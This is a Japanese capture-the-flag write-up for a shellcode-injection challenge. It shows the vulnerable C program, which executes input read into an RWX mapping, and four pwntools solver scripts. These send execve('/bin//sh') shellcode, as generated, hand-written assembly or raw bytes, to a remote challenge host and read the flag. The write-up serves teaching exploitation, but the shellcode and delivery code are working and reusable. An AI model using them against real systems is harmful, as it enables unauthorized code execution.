Alpacaをコントロール
/*
 * Challenge entry point (vulnerable by design): copies attacker-controlled
 * bytes into an anonymous writable+executable mapping and jumps to them.
 */
int main(void) {
    /* 0x100-byte anonymous mapping, writable and executable.
     * PROT_READ is not requested; the exploit below still works, so the
     * platform evidently treats the writable page as readable (presumably
     * x86-64 page-protection semantics -- confirm elsewhere).
     * The MAP_FAILED return value is never checked. */
    void *addr = mmap(NULL, 0x100, PROT_WRITE|PROT_EXEC,
                      MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    puts("Alpaca> ");
    /* fgets reads at most 0xff bytes, stops at the first '\n' (which it
     * keeps) and appends a NUL; NUL bytes in the input are read through.
     * So the payload must be newline-free and fit in 0xff bytes, but it
     * does NOT have to be NUL-free. */
    fgets(addr, 0x100, stdin);
    /* Jump straight into whatever was read: arbitrary shellcode execution. */
    ((void(*)())addr)();
    return 0;
}
好きなシェルコードを送ろうの回
pwntoolsで横着するパターン
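from pwn import *

context.arch = "amd64"
context.os = "linux"

# The target reads our bytes with fgets(addr, 0x100, stdin) into an RWX
# mapping and jumps to them. fgets stops at the first 0x0a and reads at most
# 0xff bytes, so the payload must be newline-free and fit in that budget
# (NUL bytes are fine). The '\n' that sendline() appends is what ends the read.
MAX_SHELLCODE = 0xff

sc = asm(shellcraft.sh())
if b"\n" in sc or len(sc) > MAX_SHELLCODE:
    raise ValueError("shellcode would be truncated by fgets(addr, 0x100, stdin)")

p = remote("34.170.146.252", 29682)
p.sendline(sc)
# The spawned shell inherits stdin, so the command can be queued right away.
p.sendline("cat f*")
p.interactive()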
from pwn import *

# Same target, but let the shellcode dump flag.txt itself instead of
# spawning a shell, so nothing has to be sent after the payload.
context.update(arch="amd64", os="linux")

io = remote("34.170.146.252", 29682)
payload = asm(shellcraft.cat("flag.txt"))
io.sendline(payload)
io.interactive()
asm書くパターン
(null-free / 22 bytes。補足: 入力は fgets(addr, 0x100, stdin) で読まれるので、実際に必須なのは「0x0a (改行) を含まない」ことと 0xff バイト以内に収まることで、NUL バイトがあっても fgets は止まらない。下のコードはどちらも満たしている)
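from pwn import *

context.arch = "amd64"
context.os = "linux"

# Hand-written execve("/bin//sh", NULL, NULL), 22 bytes once assembled.
# The target copies it with fgets(addr, 0x100, stdin), so the encoding must
# contain no 0x0a byte (fgets stops at the first newline) and stay within
# 0xff bytes; NUL bytes would be tolerated, this encoding simply has none.
asm_code = "\n".join([
    "xor esi, esi",                 # rsi = 0            -> argv = NULL
    "mov rbx, 0x68732f2f6e69622f",  # "/bin//sh" little-endian; doubled '/' fills 8 bytes without a NUL
    "push rsi",                     # 8 zero bytes: the string's NUL terminator
    "push rbx",                     # the string itself; rsp now points at it
    "push rsp",
    "pop rdi",                      # rdi = &"/bin//sh"  -> pathname
    "push 0x3b",
    "pop rax",                      # rax = 59           -> SYS_execve
    "cdq",                          # rdx = 0 (eax is positive) -> envp = NULL
    "syscall",
])
sc = asm(asm_code)
if b"\n" in sc or len(sc) > 0xff:
    raise ValueError("shellcode would be truncated by the target's fgets()")

p = remote("34.170.146.252", 29682)
p.sendline(sc)
# The spawned shell inherits stdin, so the command can be queued right away.
p.sendline("cat f*")
p.interactive()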
ベタ書き
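from pwn import *

context.arch = "amd64"
context.os = "linux"

# The same 22-byte execve("/bin//sh", NULL, NULL) shellcode as raw bytes.
# Note the single backslashes: b"\x31\xf6" is two bytes, whereas
# b"\\x31\\xf6" would be the eight ASCII characters of the escape sequences
# and would crash the target instead of spawning a shell.
sc = (
    b"\x31\xf6"                                   # xor esi, esi   (argv = NULL)
    b"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"   # mov rbx, "/bin//sh"
    b"\x56"                                       # push rsi       (NUL terminator)
    b"\x53"                                       # push rbx       (the string)
    b"\x54"                                       # push rsp
    b"\x5f"                                       # pop rdi        (rdi = &string)
    b"\x6a\x3b"                                   # push 0x3b
    b"\x58"                                       # pop rax        (SYS_execve)
    b"\x99"                                       # cdq            (rdx = 0, envp = NULL)
    b"\x0f\x05"                                   # syscall
)
# No 0x0a byte and far below 0xff bytes, so the target's
# fgets(addr, 0x100, stdin) takes the payload whole.

p = remote("34.170.146.252", 29682)
p.sendline(sc)
# The spawned shell inherits stdin, so the command can be queued right away.
p.sendline("cat f*")
p.interactive()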
Shellcodes database for study cases が参考になります。